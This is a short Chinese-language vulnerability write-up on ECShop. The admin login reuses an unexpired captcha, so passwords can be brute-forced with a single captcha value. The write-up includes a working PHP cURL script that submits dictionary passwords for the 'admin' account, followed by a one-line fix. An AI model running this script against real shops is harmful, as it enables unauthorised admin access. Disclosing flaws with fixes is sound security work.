ecshop绕过验证码暴力破解
若验证码不匹配,并没有销毁当前验证码
所以就可以一次请求验证码图片后,只要不再刷新验证码就可以一直使用
1.获取正确的验证码
2.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
|
<?php $admin_path = '/admin/privilege.php' ; $captcha = '上一步获取的验证码' ; $referer = $site ; function getH( $url , $postdata = array ()){ global $ch , $referer ; $options = array ( CURLOPT_URL => $url , CURLOPT_HEADER => false, CURLOPT_TIMEOUT=> 0.11, //CURLOPT_FILE=>$f, CURLOPT_RETURNTRANSFER=>true, CURLOPT_REFERER=> $referer , //CURLOPT_POST=>1, CURLOPT_HTTPHEADER=> array ( 'Content-Type: application/x-www-form-urlencoded; charset=iso-8859-1' , 'Expect:' ), CURLOPT_USERAGENT=> 'ie' ); if (! empty ( $postdata )){ $options [CURLOPT_POSTFIELDS]=http_build_query( $postdata ); } $ret = curl_setopt_array( $ch , $options ); //$ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//返回一个字符串,而不是直接输出到浏览器 $ret = curl_exec( $ch ); $info = curl_getinfo( $ch ); if ( empty ( $info [ 'http_code' ])) { die ( "No HTTP code was returned" ); } else if ( $info [ 'http_code' ]==200) { //响应码为200 return $ret ; } else { #var_dump( $info ); echo '<br />' ; echo ( '响应码:' . $info [ 'http_code' ]); // echo '<br />' ; echo $postdata [ 'username' ]. ' ---' . $postdata [ 'password' ]; echo '<br />' ; } } $url = $site . $admin_path ; $data = array ( 'username' => 'admin' , 'password' => '123456ad' , 'captcha' => $captcha , 'act' => 'signin' ); //词典 $passwds = array ( '1' , '2' , '3' , '123456a' , '123456' , '123456ds' ); foreach ( $passwds as $p ){ $data [ 'password' ]= $p ; $res = strip_tags (getH( $url , $data )); if ( stripos ( $res , '您输入的帐号信息不正确' )){ echo 'no' ; } echo '<br>------------------------<br>' ; } |
修复方案:
验证识别后销毁session中的验证码